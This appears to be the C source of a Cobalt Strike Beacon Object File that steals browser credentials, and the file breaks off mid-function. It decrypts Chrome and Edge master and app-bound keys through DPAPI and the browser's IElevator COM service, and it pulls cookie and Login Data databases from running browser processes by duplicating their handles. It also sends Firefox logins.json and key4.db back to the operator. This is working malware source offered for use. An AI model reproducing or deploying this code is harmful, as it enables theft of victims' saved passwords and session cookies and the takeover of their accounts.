WINBASEAPI HANDLE WINAPI  KERNEL32$OpenProcess (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
WINBASEAPI BOOL WINAPI    CRYPT32$CryptStringToBinaryA (LPCSTR pszString, DWORD cchString, DWORD dwFlags, BYTE *pbBinary, DWORD *pcbBinary, DWORD *pdwSkip, DWORD *pdwFlags);
//WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress (HMODULE hModule, LPCSTR lpProcName);
//WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA (LPCSTR lpLibFileName);
WINBASEAPI DWORD WINAPI   KERNEL32$SetFilePointer (HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod);
//WINBASEAPI VOID WINAPI    KERNEL32$SetLastError (DWORD dwErrCode);
DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$NtQuerySystemInformation(int SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength);
WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count);
WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE hHeap, DWORD dwFlags, LPVOID lpMem);
WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap (VOID);
WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtQueryObject(HANDLE, OBJECT_INFORMATION_CLASS, PVOID, ULONG, PULONG);

WINBASEAPI BSTR WINAPI OLEAUT32$SysAllocStringByteLen(LPCSTR psz,UINT len);
WINBASEAPI void WINAPI OLEAUT32$SysFreeString(BSTR);
WINBASEAPI UINT WINAPI OLEAUT32$SysStringByteLen(BSTR bstr);

DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx (LPVOID pvReserved, DWORD dwCoInit);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoUninitialize (void);
DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv);
DECLSPEC_IMPORT	HRESULT WINAPI OLE32$CoSetProxyBlanket(IUnknown* pProxy, DWORD dwAuthnSvc, DWORD dwAuthzSvc, OLECHAR* pServerPrincName, DWORD dwAuthnLevel, DWORD dwImpLevel, RPC_AUTH_IDENTITY_HANDLE pAuthInfo, DWORD dwCapabilities);
WINBASEAPI void __cdecl MSVCRT$free(void *_Memory);
WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T);
DECLSPEC_IMPORT SECURITY_STATUS WINAPI NCRYPT$NCryptFreeObject (NCRYPT_HANDLE hObject);
DECLSPEC_IMPORT SECURITY_STATUS WINAPI NCRYPT$NCryptDecrypt (NCRYPT_KEY_HANDLE hKey, PBYTE pbInput, DWORD cbInput, VOID *pPaddingInfo, PBYTE pbOutput, DWORD cbOutput, DWORD *pcbResult, DWORD dwFlags);
DECLSPEC_IMPORT SECURITY_STATUS WINAPI NCRYPT$NCryptOpenKey (NCRYPT_PROV_HANDLE hProvider, NCRYPT_KEY_HANDLE *phKey, LPCWSTR pszKeyName, DWORD dwLegacyKeySpec, DWORD dwFlags);
DECLSPEC_IMPORT SECURITY_STATUS WINAPI NCRYPT$NCryptOpenStorageProvider (NCRYPT_PROV_HANDLE *phProvider, LPCWSTR pszProviderName, DWORD dwFlags);

DECLSPEC_IMPORT HRESULT WINAPI SHELL32$SHGetFolderPathA(HWND hwnd, int csidl, HANDLE hToken, DWORD dwFlags, LPSTR pszPath);
WINBASEAPI BOOL WINAPI SHLWAPI$PathAppendA(LPCSTR pszPath, LPCSTR pszMore);
WINBASEAPI int __cdecl MSVCRT$rand();
WINBASEAPI void __cdecl MSVCRT$srand(int initial);
WINBASEAPI time_t __cdecl MSVCRT$time(time_t *time);
WINBASEAPI size_t __cdecl MSVCRT$strnlen(const char *_Str,size_t _MaxCount);

//#define IMPORT_RESOLVE FARPROC SHGetFolderPath = Resolver("shell32", "SHGetFolderPathA"); \
//    FARPROC PathAppend = Resolver("shlwapi", "PathAppendA"); \
//    FARPROC srand = Resolver("msvcrt", "srand");\
//    FARPROC time = Resolver("msvcrt", "time");\
//    FARPROC strnlen = Resolver("msvcrt", "strnlen");\
//    FARPROC rand = Resolver("msvcrt", "rand");\
//    FARPROC realloc = Resolver("msvcrt", "realloc");
#define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size)
#define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr)
#define DATA_FREE(d, l) \
    if (d) { \
        MSVCRT$memset(d, 0, l); \
        intFree(d); \
        d = NULL; \
    }
#define CSIDL_LOCAL_APPDATA 0x001c
#define CSIDL_APPDATA 0x001a
static char* supported_browsers[] = {"chrome", "msedge", "firefox"};

//workaround for no slot for function (reduce number of Win32 APIs called)
//FARPROC Resolver(CHAR *lib, CHAR *func) {
//    FARPROC ptr = KERNEL32$GetProcAddress(KERNEL32$LoadLibraryA(lib), func);
//    return ptr;
//}

CHAR* GetFileContent(CHAR *path, DWORD* size) {
    CHAR fullPath[MAX_PATH];
    HANDLE hFile = NULL;

    if (size) *size = 0;
    if (!path || !size) {
        return NULL;
    }

    if (path[0] == '\\') {
        BeaconPrintf(CALLBACK_OUTPUT,"[+] Appending local app data path\n");
        CHAR appdata[MAX_PATH];
        SHELL32$SHGetFolderPathA(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, appdata);
        SHLWAPI$PathAppendA(appdata, path);
        MSVCRT$strncpy(fullPath, appdata, MAX_PATH - 1);
        fullPath[MAX_PATH - 1] = '\0';
    } else {
        MSVCRT$strncpy(fullPath, path, MAX_PATH - 1);
        fullPath[MAX_PATH - 1] = '\0';
    }
    BeaconPrintf(CALLBACK_OUTPUT, "[+] LOOKING FOR FILE: %s", fullPath);

    //get handle to appdata
    hFile = KERNEL32$CreateFileA(fullPath, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(hFile == INVALID_HANDLE_VALUE) {
        return NULL;
    }

    DWORD dwRead = 0;
    //read cookie file and return as buffer var
    DWORD dwSize = KERNEL32$GetFileSize(hFile, NULL);
    CHAR *buffer = (CHAR*)KERNEL32$GlobalAlloc(GPTR, dwSize + 1);
    KERNEL32$ReadFile(hFile, buffer, dwSize, &dwRead, NULL);
    KERNEL32$CloseHandle(hFile);

    if(dwSize != dwRead) {
        BeaconPrintf(CALLBACK_OUTPUT,"[!] file size mismatch. Expected %lu, got %lu\n", dwSize, dwRead);
        KERNEL32$GlobalFree(buffer);
        *size = 0;
        return NULL;
    }
    *size = dwSize;
    return buffer;
}

CHAR *ExtractKey(CHAR *buffer, CHAR * pattern) {
    //look for pattern with key
    //CHAR pattern[] = "\"encrypted_key\":\"";
    CHAR *start = MSVCRT$strstr(buffer, pattern);
    CHAR *end = NULL;
    CHAR *key = NULL;
    DWORD dwSize = 0;

    if(start == NULL) {
        return NULL;
    }

    // calc length of key
    start += MSVCRT$strlen(pattern);
    buffer = start;
    end = MSVCRT$strstr(buffer, "\"");

    if(end == NULL) {
        return NULL;
    }
    dwSize = end - start;

    //extract key from file
    key = (CHAR*)KERNEL32$GlobalAlloc(GPTR, dwSize + 1);
    MSVCRT$strncpy(key, buffer, dwSize);
    return key;
}

VOID GetMasterKey(CHAR *key) {
    Buffer result = {0};
    DWORD dwOut = 0;

    //calculate size of key
    if (!CRYPT32$CryptStringToBinaryA(key, 0, CRYPT_STRING_BASE64, NULL, &dwOut, NULL, NULL)) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to decrypt base64 key\n");
        return;
    }
    result.data = (unsigned char*)MSVCRT$malloc(dwOut);
    if (!result.data) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to allocate memory for key\n");
        return;
    }
    if (!CRYPT32$CryptStringToBinaryA(key, 0, CRYPT_STRING_BASE64, result.data, &dwOut, NULL, NULL)) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to decrypt base64 key\n");
        MSVCRT$free(result.data);
        return;
    }

    if (dwOut < 5 || MSVCRT$memcmp(result.data, "DPAPI", 5) != 0) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Invalid DPAPI Prefix\n");
        MSVCRT$free(result.data);
        return;
    }
    DATA_BLOB db;
    DATA_BLOB final;
    db.pbData = result.data + 5;
    db.cbData = dwOut - 5;

    //decrypt key with dpapi for current user
    if (!CRYPT32$CryptUnprotectData(&db, NULL, NULL, NULL, NULL, 0, &final)) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Decrypting the key failed.\n");
        MSVCRT$free(result.data);
        return;
    }

    // return decrypted key
    CHAR *output = (CHAR*)KERNEL32$GlobalAlloc(GPTR, (final.cbData * 4) + 1);
    if (!output) {
        MSVCRT$free(result.data);
        return;
    }
    int offset = 0;
    for(DWORD i = 0; i < final.cbData; i++) {
        int written = MSVCRT$_snprintf( output + offset, (final.cbData * 4) + 1 - offset, "\\x%02x", final.pbData[i] );
        if (written < 0) break;
        offset += written;
    }
    BeaconPrintf(CALLBACK_OUTPUT,"[+] -> Decrypted Master Key: %s \n", output );

    // rewind to the start of the buffer
    MSVCRT$free(result.data);
    KERNEL32$GlobalFree(output);
    KERNEL32$LocalFree(final.pbData);
}

// https://gist.github.com/snovvcrash/caded55a318bbefcb6cc9ee30e82f824
const uint8_t kCryptAppBoundKeyPrefix[] = { 'A', 'P', 'P', 'B' };
const char* BASE64_CHARS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
#define KEY_SIZE 32

int isBase64(char c) {
    return (c >= 'A' && c <= 'Z') ||    // Uppercase letters
           (c >= 'a' && c <= 'z') ||    // Lowercase letters
           (c >= '0' && c <= '9') ||    // Digits
           (c == '+') || (c == '/');    // '+' and '/'
}

uint8_t* Base64Decode(const char* encoded_string, size_t* out_len) {
    if (!encoded_string || !out_len) {
        if (out_len) *out_len = 0;
        return NULL;
    }

    int in_len = MSVCRT$strlen(encoded_string);
    int i = 0, j = 0, in_ = 0;
    uint8_t char_array_4[4], char_array_3[3];
    size_t decoded_size = ((in_len + 3) / 4) * 3;
    uint8_t* decoded_data = (uint8_t*)MSVCRT$malloc(decoded_size);
    if (!decoded_data) {
        *out_len = 0;
        return NULL;
    }
    *out_len = 0;
    while (in_len-- && (encoded_string[in_] != '=') && isBase64(encoded_string[in_])) {
        char_array_4[i++] = encoded_string[in_]; in_++;
        if (i == 4) {
            for (i = 0; i < 4; i++) {
                char *pos = MSVCRT$strchr(BASE64_CHARS, char_array_4[i]);
                if (pos == NULL) {
                    BeaconPrintf(CALLBACK_ERROR, "[!] Invalid base64 character\n");
                    MSVCRT$free(decoded_data);
                    *out_len = 0;
                    return NULL;
                }
                char_array_4[i] = pos - BASE64_CHARS;
            }
            char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
            char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
            char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];

            for (i = 0; i < 3; i++)
                decoded_data[(*out_len)++] = char_array_3[i];
            i = 0;
        }
    }

    if (i) {
        for (j = i; j < 4; j++) char_array_4[j] = 0;
        for (j = 0; j < 4; j++) char_array_4[j] = MSVCRT$strchr(BASE64_CHARS, char_array_4[j]) - BASE64_CHARS;
        char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
        char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
        char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];

        for (j = 0; j < i - 1; j++) decoded_data[(*out_len)++] = char_array_3[j];
    }

    //BeaconPrintf(CALLBACK_OUTPUT, "Decoded Data: %s\n", decoded_data);
    return decoded_data;
}

char* BytesToHexString(const BYTE *byteArray, size_t size) {
    char *hexStr = (char*)MSVCRT$malloc((size * 4) + 1);
    if (!hexStr) return NULL;
    for (size_t i = 0; i < size; ++i) {
        int result = MSVCRT$_snprintf( hexStr + (i * 4), 5, "\\x%02x", byteArray[i] );
        if (result < 0) {
            MSVCRT$free(hexStr);
            return NULL;
        }
    }
    return hexStr;
}

VOID GetAppBoundKey(CHAR * key, CHAR * browser, const CLSID CLSID_Elevator, const IID IID_IElevator) {
    // initialize COM
    HRESULT hr = OLE32$CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
    if (FAILED(hr)) {
    	hr = OLE32$CoInitializeEx(NULL, COINIT_MULTITHREADED);
    	if (FAILED(hr)) {
			BeaconPrintf(CALLBACK_ERROR,"[!] CoInitializeEx failed: 0x%x\n", hr);
        	return;
		}
    }
    IElevatorChrome* chromeElevator = NULL;
    IElevatorEdge* edgeElevator = NULL;
    // Create an instance of the IElevator COM object
    if (MSVCRT$strcmp(browser, "chrome") == 0){
        hr = OLE32$CoCreateInstance(&CLSID_Elevator, NULL, CLSCTX_LOCAL_SERVER, &IID_IElevator, (void**)&chromeElevator);
        if (FAILED(hr)){
            BeaconPrintf(CALLBACK_ERROR, "[*] CoCreateInstance with Chrome_IID_IElevator2 failed (0x%08X), trying Chrome_IID_IElevator...\n", hr);
            hr = OLE32$CoCreateInstance(&CLSID_Elevator, NULL, CLSCTX_LOCAL_SERVER, &Chrome_IID_IElevator, (void**)&chromeElevator);
        }
    }
    if (MSVCRT$strcmp(browser, "msedge") == 0){
        hr = OLE32$CoCreateInstance(&CLSID_Elevator, NULL, CLSCTX_LOCAL_SERVER, &IID_IElevator, (void**)&edgeElevator);
    }
    if (FAILED(hr)) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to create IElevator instance.\n");
        OLE32$CoUninitialize();
        return;
    }
    // Set the security blanket on the proxy
    if (MSVCRT$strcmp(browser, "chrome") == 0) {
        hr = OLE32$CoSetProxyBlanket(
            (IUnknown *) chromeElevator,
            RPC_C_AUTHN_DEFAULT,
            RPC_C_AUTHZ_DEFAULT,
            COLE_DEFAULT_PRINCIPAL,
            RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
            RPC_C_IMP_LEVEL_IMPERSONATE,
            NULL,
            EOAC_DYNAMIC_CLOAKING
        );
    }
    if (MSVCRT$strcmp(browser, "msedge") == 0) {
        hr = OLE32$CoSetProxyBlanket(
            (IUnknown *) edgeElevator,
            RPC_C_AUTHN_DEFAULT,
            RPC_C_AUTHZ_DEFAULT,
            COLE_DEFAULT_PRINCIPAL,
            RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
            RPC_C_IMP_LEVEL_IMPERSONATE,
            NULL,
            EOAC_DYNAMIC_CLOAKING
        );
    }

    if (FAILED(hr)) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to set proxy blanket.\n");
        OLE32$CoUninitialize();
        return;
    }

    // base64 decode
    size_t encrypted_key_len;
    uint8_t* encrypted_key_with_header = Base64Decode(key, &encrypted_key_len);
    if (MSVCRT$memcmp(encrypted_key_with_header, kCryptAppBoundKeyPrefix, sizeof(kCryptAppBoundKeyPrefix)) != 0) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Invalid key header.\n");
        MSVCRT$free(encrypted_key_with_header);
        OLE32$CoUninitialize();
        return;
    }

    //remove app bound key prefix
    uint8_t *encrypted_key = (uint8_t*)MSVCRT$malloc(encrypted_key_len - sizeof(kCryptAppBoundKeyPrefix));
    MSVCRT$memcpy(encrypted_key, encrypted_key_with_header + sizeof(kCryptAppBoundKeyPrefix), encrypted_key_len - sizeof(kCryptAppBoundKeyPrefix));
    encrypted_key_len -= sizeof(kCryptAppBoundKeyPrefix);

    BSTR ciphertext_data = OLEAUT32$SysAllocStringByteLen((const char*)encrypted_key , encrypted_key_len );

    BSTR plaintext_data = NULL;
    DWORD last_error = ERROR_GEN_FAILURE;
    if (MSVCRT$strcmp(browser, "chrome") == 0){
        hr = chromeElevator->lpVtbl->DecryptData(chromeElevator,ciphertext_data, &plaintext_data, &last_error);
    }
    if (MSVCRT$strcmp(browser, "msedge") == 0){
        hr = edgeElevator->lpVtbl->DecryptData(edgeElevator,ciphertext_data, &plaintext_data, &last_error);
    }
    // return decrypted key
    if (SUCCEEDED(hr)) {
        DWORD decrypted_size = OLEAUT32$SysStringByteLen(plaintext_data);
        BeaconPrintf(CALLBACK_OUTPUT, "[+] => Decrypted App Bound Key: %s\n", BytesToHexString(plaintext_data, decrypted_size));
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "       App Bound Key Decryption failed. Last error: %lu (If error 203, beacon is most likely not operating out of correct file path)\n", last_error);
    }

    OLEAUT32$SysFreeString(plaintext_data);
    OLEAUT32$SysFreeString(ciphertext_data);

    MSVCRT$free(encrypted_key_with_header);
    MSVCRT$free(encrypted_key);
    if (MSVCRT$strcmp(browser, "chrome") == 0){
        hr = chromeElevator->lpVtbl->Release(chromeElevator);
    }
    if (MSVCRT$strcmp(browser, "msedge") == 0){
        hr = edgeElevator->lpVtbl->Release(edgeElevator);
    }

    OLE32$CoUninitialize();
    return;
}

VOID GetEncryptionKey(char * browser) {
    char * browserProcess = "";
    char * localStatePath = "";

    if (MSVCRT$strcmp(browser, "msedge") == 0){
        browserProcess = "msedge.exe";
        localStatePath = "\\Microsoft\\Edge\\User Data\\Local State";
    }
    if (MSVCRT$strcmp(browser, "chrome") == 0){
        browserProcess = "chrome.exe";
        localStatePath = "\\Google\\Chrome\\User Data\\Local State";
    }

    // now we can decrypt v10 as well, as it is not needed with the use of app bound encryption
    CHAR *app_key = NULL;
    CHAR *key = NULL;
    DWORD app_data_size = NULL;
    CHAR *app_data = GetFileContent(localStatePath, &app_data_size);
    if(app_data == NULL) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Reading the file failed.\n");
        return;
    }

    CHAR pattern[] = "\"encrypted_key\":\"";
    key = ExtractKey(app_data, pattern);
    CHAR app_pattern[] =  "\"app_bound_encrypted_key\":\"";
    app_key = ExtractKey(app_data, app_pattern);
    if(key != NULL) {
        GetMasterKey(key);
    } else {
        BeaconPrintf(CALLBACK_ERROR,"[!] There's no v10 encryption key, checking v20...");
    }
    if(app_key == NULL) {
        BeaconPrintf(CALLBACK_ERROR,"[!] No appbound encryption key available\n");
        return;
    }
    if (MSVCRT$strcmp(browser, "chrome") == 0){
        GetAppBoundKey(app_key, browser, Chrome_CLSID_Elevator, Chrome_IID_IElevator2);
    }
    if (MSVCRT$strcmp(browser, "msedge") == 0){
        GetAppBoundKey(app_key, browser, Edge_CLSID_Elevator, Edge_IID_IElevator);
    }
    KERNEL32$GlobalFree(app_data);

    return;
}

CHAR *GetFirefoxFile(CHAR *file, CHAR* profile){
    size_t profile_len = MSVCRT$strlen(profile);
    size_t file_len = MSVCRT$strlen(file);
    size_t total_len = profile_len + file_len + 1;

    CHAR *tempProfile = (CHAR*)KERNEL32$GlobalAlloc(GPTR, total_len);
    if (!tempProfile) return NULL;

    MSVCRT$strncpy(tempProfile, profile, profile_len);
    MSVCRT$strncat(tempProfile, file, file_len);

    return tempProfile;
}

VOID GetFirefoxInfo() {
    //get firefox key
    CHAR appdata[MAX_PATH];
    HANDLE hFile = NULL;

    //get appdata local path and append path
    SHELL32$SHGetFolderPathA(NULL, CSIDL_APPDATA, NULL, 0, appdata);
    SHLWAPI$PathAppendA(appdata, "\\Mozilla\\Firefox\\profiles.ini");

    //get handle to appdata
    hFile = KERNEL32$CreateFileA(appdata, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(hFile == INVALID_HANDLE_VALUE) {
        BeaconPrintf(CALLBACK_ERROR,"[!] File not found at: %s \n", appdata);
        BeaconPrintf(CALLBACK_ERROR,"[!] Firefox not found on host\n");
        return;
    }

    CHAR *buffer = NULL;
    DWORD dwSize = 0;
    DWORD dwRead = 0;

    //read profiles.ini file and return as buffer var
    dwSize = KERNEL32$GetFileSize(hFile, NULL);
    buffer = (CHAR*)KERNEL32$GlobalAlloc(GPTR, dwSize + 1);
    KERNEL32$ReadFile(hFile, buffer, dwSize, &dwRead, NULL);
    if(dwSize != dwRead) {
        BeaconPrintf(CALLBACK_ERROR,"[!] file size mismatch.\n");
    }
    KERNEL32$CloseHandle(hFile);

    //look for pattern Default=Profiles/
    CHAR pattern[] = "Default=Profiles/";
    CHAR *start = MSVCRT$strstr(buffer, pattern);
    CHAR *end = NULL;
    if(start == NULL) {
        return;
    }

    // calc length of profile
    start += MSVCRT$strlen(pattern);
    buffer = start;
    end = MSVCRT$strstr(buffer, ".default-release");

    if(end == NULL) {
        return ;
    }
    dwSize = end - start;

    //extract profile from file
    CHAR *profile = NULL;
    profile = (CHAR*)KERNEL32$GlobalAlloc(GPTR, dwSize + 1);
    MSVCRT$strncpy(profile, buffer, dwSize);

    BeaconPrintf(CALLBACK_OUTPUT,"[+] Firefox Default Profile: %s \n", profile );

    // get path to logins.json
    CHAR *logins = NULL;
    logins = GetFirefoxFile(".default-release\\logins.json", profile);

    //check if logins.json exists
    hFile = KERNEL32$CreateFileA(logins, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(hFile == INVALID_HANDLE_VALUE) {
        BeaconPrintf(CALLBACK_ERROR,"[!] File not found at: %s \n", logins);
        return;
    }
    else{
        BeaconPrintf(CALLBACK_OUTPUT,"[+] Firefox Stored Credentials found at: %s \n", logins);
        DWORD dwRead = 0;
        DWORD dwFileSize = KERNEL32$GetFileSize(hFile, NULL);
        CHAR *buffer = (CHAR*)KERNEL32$GlobalAlloc(GPTR, dwFileSize);
        KERNEL32$ReadFile(hFile, buffer, dwFileSize, &dwRead, NULL);
        download_file(logins, buffer, dwFileSize);
        KERNEL32$GlobalFree(buffer);
        KERNEL32$CloseHandle(hFile);
    }

    // get path to logins.json
    CHAR *database = NULL;
    database = GetFirefoxFile(".default-release\\key4.db", profile);

    //check if key4.db exists
    hFile = KERNEL32$CreateFileA(database, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(hFile == INVALID_HANDLE_VALUE) {
        BeaconPrintf(CALLBACK_ERROR,"[!] File not found at: %s \n", database);
        return;
    }
    else{
        BeaconPrintf(CALLBACK_OUTPUT,"[+] Firefox Database found at: %s \n", database);
        DWORD dwRead = 0;
        DWORD dwFileSize = KERNEL32$GetFileSize(hFile, NULL);
        CHAR *buffer = (CHAR*)KERNEL32$GlobalAlloc(GPTR, dwFileSize);
        KERNEL32$ReadFile(hFile, buffer, dwFileSize, &dwRead, NULL);
        download_file(database, buffer, dwFileSize);
        KERNEL32$GlobalFree(buffer);
        KERNEL32$CloseHandle(hFile);
    }

}

VOID GetBrowserData(char * browser, BOOL cookie, BOOL loginData, char * folderPath) {
    //get handle to all processes
    HANDLE hSnap = KERNEL32$CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe32;
    INT processCount = 0;
    BOOL databaseStatus = FALSE;
    BOOL passwordStatus = FALSE;
    // if cookie only
    if (cookie && !loginData) {
        passwordStatus = TRUE;
    } else if (loginData && !cookie) { // Password only
        databaseStatus = TRUE;
    }
    pe32.dwSize = sizeof(PROCESSENTRY32);

    char * browserProcess = "";
    char * cookieDB = "";
    char * passwordDB = "";
    char * cookiePath = "";
    char * passwordPath = "";

    if (MSVCRT$strcmp(browser, "msedge") == 0){
        browserProcess = "msedge.exe";
        cookieDB = "EdgeCookies.db";
        passwordDB = "EdgePasswords.db";
        cookiePath = "\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies";
        passwordPath = "\\Microsoft\\Edge\\User Data\\Default\\Login Data";
    }
    if (MSVCRT$strcmp(browser, "chrome") == 0){
        browserProcess = "chrome.exe";
        cookieDB = "ChromeCookies.db";
        passwordDB = "ChromePasswords.db";
        cookiePath = "\\Google\\Chrome\\User Data\\Default\\Network\\Cookies";
        passwordPath = "\\Google\\Chrome\\User Data\\Default\\Login Data";
    }

    //iterate through each handle to find browser process
    BeaconPrintf(CALLBACK_OUTPUT, "[+] Looking for %s Data \n", browser);
    if(KERNEL32$Process32First(hSnap, &pe32)) {
        do {
            //BeaconPrintf(CALLBACK_OUTPUT, "Process: %s\n", pe32.szExeFile);
            if(MSVCRT$strcmp(pe32.szExeFile, browserProcess) == 0)
            {
                //edge was found, get cookies database
                processCount++;
                if (!databaseStatus){
                    if (GetBrowserFile(pe32.th32ProcessID, "Network\\Cookies", cookieDB, folderPath)){
                        databaseStatus = TRUE;
                    }
                }
                if (!passwordStatus){
                    if (GetBrowserFile(pe32.th32ProcessID, "Login Data", passwordDB, folderPath)){
                        passwordStatus = TRUE;
                    }
                }
                // Early exit if both files are found
                if (databaseStatus && passwordStatus) {
                    break;
                }
            }
        } while(KERNEL32$Process32Next(hSnap, &pe32));
        if (!databaseStatus && cookie) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Failed to locate cookies database for %s", browser);
        }
        if (!passwordStatus && loginData) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Failed to locate login data for %s", browser);
        }
    }
    KERNEL32$CloseHandle(hSnap);
    //check if process was running
    if (processCount == 0) {
        //check if file exists
        BeaconPrintf(CALLBACK_OUTPUT,"[!] %s not found running on host -> Downloading cookies directly from %s \n", browser, cookieDB);
        DWORD data_size = 0;
        CHAR *data = GetFileContent(cookiePath, &data_size);
        if(data == NULL) {
            BeaconPrintf(CALLBACK_ERROR,"%s COOKIES not found on host\n", browser);
            goto ret;
        }
        // if copy folder is not null, then copy to folder instead of download_file()
        if (MSVCRT$strcmp(folderPath, "") != 0){
            CHAR cookieFilePath[MAX_PATH];
            MSVCRT$sprintf(cookieFilePath, "%s\\%s", folderPath, cookieDB);
            HANDLE hFile = KERNEL32$CreateFileA(cookieFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

            if (hFile == INVALID_HANDLE_VALUE) {
                BeaconPrintf(CALLBACK_ERROR, "Failed to write cookie file to %s\n", cookieFilePath);
            } else {
                DWORD written = 0;
                if (!KERNEL32$WriteFile(hFile, data, data_size, &written, NULL)) {
                    BeaconPrintf(CALLBACK_ERROR, "[!] WriteFile failed: %lu\n", KERNEL32$GetLastError());
                    KERNEL32$CloseHandle(hFile);
                    goto ret;
                }
                if (written != data_size) {
                    BeaconPrintf(CALLBACK_ERROR, "[!] Wrote %lu bytes, expected %lu\n", written, data_size);
                }

                BeaconPrintf(CALLBACK_OUTPUT, "Wrote cookie file to: %s\n", cookieFilePath);
                KERNEL32$CloseHandle(hFile);
            }

        } else {
            download_file(cookieDB, data, data_size);
        }
        //download_file(cookieDB,data, sizeof(data));
        KERNEL32$GlobalFree(data);
        data_size = 0;
        CHAR *passwordData = GetFileContent(passwordPath, &data_size);
        if(passwordData == NULL) {
            BeaconPrintf(CALLBACK_ERROR,"%s LOGIN DATA not found on host\n", browser);
            goto ret;
        }
        // if copy folder is not null, then copy to folder instead of download_file()
        if (MSVCRT$strcmp(folderPath, "") != 0){
            CHAR passwordFilePath[MAX_PATH];
            MSVCRT$sprintf(passwordFilePath, "%s\\%s", folderPath, passwordDB);
            HANDLE hFile = KERNEL32$CreateFileA(passwordFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

            if (hFile == INVALID_HANDLE_VALUE) {
                BeaconPrintf(CALLBACK_ERROR, "Failed to write password file to %s\n", passwordFilePath);
            } else {
                DWORD written = 0;
                if (!KERNEL32$WriteFile(hFile, passwordData, data_size, &written, NULL)) {
                    BeaconPrintf(CALLBACK_ERROR, "[!] WriteFile failed: %lu\n", KERNEL32$GetLastError());
                    KERNEL32$CloseHandle(hFile);
                    goto ret;
                }
                if (written != data_size) {
                    BeaconPrintf(CALLBACK_ERROR, "[!] Wrote %lu bytes, expected %lu\n", written, data_size);
                }

                BeaconPrintf(CALLBACK_OUTPUT, "Wrote password file to: %s\n", passwordFilePath);
                KERNEL32$CloseHandle(hFile);
            }
        } else {
            download_file(passwordDB,passwordData, data_size);
        }
        KERNEL32$GlobalFree(passwordData);
    }
ret:
    BeaconPrintf(CALLBACK_OUTPUT, "==============================\n");
}

BOOL GetBrowserFile(DWORD PID, CHAR *browserFile, CHAR *downloadFileName, CHAR * folderPath) {
    //BeaconPrintf(CALLBACK_OUTPUT,"Browser PID found %d\n", PID);
    //BeaconPrintf(CALLBACK_OUTPUT,"Searching for handle to %s \n", browserFile);

    SYSTEM_HANDLE_INFORMATION_EX *shi = NULL;
    DWORD dwNeeded = 0;
    DWORD dwSize = 0xffffff / 2;
    BOOL result = FALSE;

    // outside declaration
    POBJECT_NAME_INFORMATION objectNameInfo = NULL;
    PPUBLIC_OBJECT_TYPE_INFORMATION objectTypeInfo = NULL;
    HANDLE hDuplicate = NULL;
    HANDLE hProc = NULL;
    CHAR *buffer = NULL;

    shi = (SYSTEM_HANDLE_INFORMATION_EX *)KERNEL32$GlobalAlloc(GPTR, dwSize);
    if (!shi) {
        BeaconPrintf(CALLBACK_ERROR, "GlobalAlloc failed for handle information.\n");
        return FALSE;
    }

    //utilize NtQueryStemInformation to list all handles on system
    NTSTATUS status = NTDLL$NtQuerySystemInformation(SystemHandleInformationEx, shi, dwSize, &dwNeeded);
